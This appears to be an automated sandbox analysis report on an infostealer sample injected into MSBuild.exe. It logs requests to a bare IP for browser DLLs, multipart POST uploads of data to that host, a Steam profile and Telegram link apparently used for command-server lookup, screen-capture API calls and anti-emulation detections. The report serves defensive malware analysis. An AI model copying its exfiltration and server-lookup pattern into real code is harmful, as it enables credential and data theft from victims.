                    Source: global traffic, HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 1145 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 453 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 130769 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040514C
                    Source: global traffic | HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /sqls.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 | Host: 78.47.123.174 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: AFBFHD.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: AFBFHD.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: AFBFHD.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: ECGIII.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001062000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899%
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899u
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: CBGCAF.1.drString found in binary or memory: https://support.mozilla.org
                    Source: CBGCAF.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: CBGCAF.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: FIIDBK.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: FIIDBK.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: AFBFHD.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: AFBFHD.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIDGDHJDBK
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknown; HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknown; HTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_004112FD _EH_prolog, memset, GetDesktopWindow, GetWindowRect, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, GlobalFix, GlobalSize, SelectObject, DeleteObject, DeleteObject, ReleaseDC, CloseWindow

                    System Summary

                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects executables containing potential Windows Defender anti-emulation checks; Author: ditekSHen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC66D901_2_6CC66D90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCFAD501_2_6CCFAD50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9ED701_2_6CC9ED70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD58D201_2_6CD58D20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC70EC01_2_6CC70EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC56E901_2_6CC56E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDAEC01_2_6CBDAEC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6EE701_2_6CC6EE70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCB0E201_2_6CCB0E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDEFB01_2_6CBDEFB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAEFF01_2_6CCAEFF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD0FE01_2_6CBD0FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD18FB01_2_6CD18FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3EF401_2_6CC3EF40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD6F101_2_6CBD6F10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC92F701_2_6CC92F70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD10F201_2_6CD10F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD68E01_2_6CCD68E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA48401_2_6CCA4840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC208201_2_6CC20820
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC5A8201_2_6CC5A820
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCEC9E01_2_6CCEC9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC049F01_2_6CC049F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC609A01_2_6CC609A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A9A01_2_6CC8A9A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC909B01_2_6CC909B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC089601_2_6CC08960
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC269001_2_6CC26900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC4EA801_2_6CC4EA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC4CA701_2_6CC4CA70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC7EA001_2_6CC7EA00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC88A301_2_6CC88A30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD6BE01_2_6CCD6BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC70BA01_2_6CC70BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC164D01_2_6CC164D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6A4D01_2_6CC6A4D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCFA4801_2_6CCFA480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE84601_2_6CBE8460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC344201_2_6CC34420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC5A4301_2_6CC5A430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC45B01_2_6CBC45B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9A5E01_2_6CC9A5E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC5E5F01_2_6CC5E5F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD185501_2_6CD18550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC285401_2_6CC28540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD45401_2_6CCD4540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC325601_2_6CC32560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC705701_2_6CC70570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2E6E01_2_6CC2E6E0
